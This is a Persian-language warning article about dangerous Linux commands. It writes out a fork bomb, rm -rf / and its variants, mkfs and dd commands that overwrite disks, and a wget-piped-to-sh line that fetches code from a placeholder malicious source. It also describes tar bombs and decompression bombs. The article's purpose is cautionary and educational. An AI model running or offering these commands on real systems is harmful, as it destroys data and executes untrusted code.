:(){ :|: & };: که با عنوان Fork Bomb نیز شناخته میشود یک حمله انکار سرویس در مقابل سیستم لینوکس است. :(){ :|: & };: یک تابع bash است. به محض اجرا خود را چندین بار تکرار میکند تا سیستم از کار بیافتد.
mv folder/dev/null یکی دیگر از فرامین خطرناک است. Dev/null یا null device یک فایل دیوایس است که تمام دادههای نوشته شده روی آن را پاک میکند، اما گزارش میدهد که عملیات نوشتن با موفقیت انجام شده است. از این فرمان به عنوان bit bucked یا black hole نیز یاد میشود.
فرمان rm –rf یک راه سریع برای حذف یک فولدر و محتویات درون آن در سیستم عامل لینوکس است. اگر شما روش صحیح استفاده از آن را بلد نباشید ممکن است به یک فرمان خطرات برای سیستم تبدیل شود. معروفترین ترکیبات و گزینههای مورد استفاده با فرمان rm –rf شامل این موارد هستند:
-
فرمان rm برای پاک کردن فایلها در سیستم لینوکس استفاده میشود.
-
فرمان rm –f فایلهای فقط خواندنی موجود در یک فولدر را بدون هیچ پیغام هشدارهای حذف میکند. -
فرمان rm –r محتوای یک فولدر را حذف میکند. -
فرمان rm –d برای پاک کردن یک دایرکتوری خالی استفاده میشود و اگر این دایرکتوری خالی نباشد از حذف آن اجتناب میکند. -
فرمان rm -rf/ برای حذف اجباری (حتی اگر در برابر بازنویسی محافظت شده باشد) محتوای دایرکتوری ریشه و زیر فولدرهای آن استفاده میشود. -
فرمان rm -rf* برای حذف اجباری تمام محتوای فولدر جاری و زیر فولدرهای آن استفاده میشود. -
فرمان rm -rf. نیز برای حذف اجباری تمام محتوای فولدر جاری و زیر فولدرهای آن استفاده میشود. میتوان از فرمان rm -r.[^.]* نیز استفاده کرد. -
فرمان rm –i برای حذف فایلها و فولدرها استفاده میشود اما قبل از حذف با پیغام به شما هشدار میدهد.
-
mkfs
-
mkfs.ext3 -
mkfs.bfs -
mkfs.ext2 -
mkfs.minix -
mkfs.msdos -
mkfs.reiserfs -
mkfs.vfat
از فرمان Tar برای جمع آوری چندین فایل داخل یک فایل واحد (یا فایل آرشیو) با فرمت .tar استفاده میشود. اما با این فرمان میتوان یک بمب Tape Archive (Tar) ساخت.
از فرمان dd برای کپی و تبدیل کردن پارتیشنهای هارد دیسک استفاده میشود. اما اگر شما مقصد را به درستی تعیین نکنید میتواند آسیب رسان شود.
-
dd if=/dev/hda of=/dev/hdb
-
dd if=/dev/hda of=/dev/sdb -
dd if=something of=/dev/hda -
dd if=something of=/dev/sda
شما ممکن است با دانلود و اجرای یک اسکریپت پوسته مخرب قربانی آن شوید. این اسکریپت ممکن است شامل کدهای مخرب و خطرناک در داخل خود باشد. فرمت این فرمان ممکن است چیزی شبیه به این باشد: wget http://some_malicious_source -O- | sh
ممکن است شخصی به شما یک کد منبع را پیشنهاد کند و از شما بخواهد آن را کامپایل کنید. شاید در ظاهر این کد طبیعی به نظر برسد اما در واقع کدهای مخرب داخل حجم زیادی از کدهای منبع پنهان شده است و میتواند به سیستم شما صدمه بزند. برای جلوگیری از قربانی شدن توسط این نوع از حملات، این کدهای منبع پیشنهادی را تنها از منابع معتبر و شناخته شده قبول کنید.
شما ممکن است یک فایل فشرده شده دریافت کنید که در ظاهر حجم زیادی ندارد اما محتوای درون آن با سطح فشرده سازی بالا پر شده است. به محض این که این فایل را از حالت فشرده خارج میکنید حجم انبوهی از داده هارد درایو شما را پر کرده و عملکرد سیستم شما را پایین میآورد. برای جلوگیری از این وضعیت همیشه دادههای مورد نظر خود را از منابع معتبر دریافت کنید.
نویسنده: محیا ضرابیان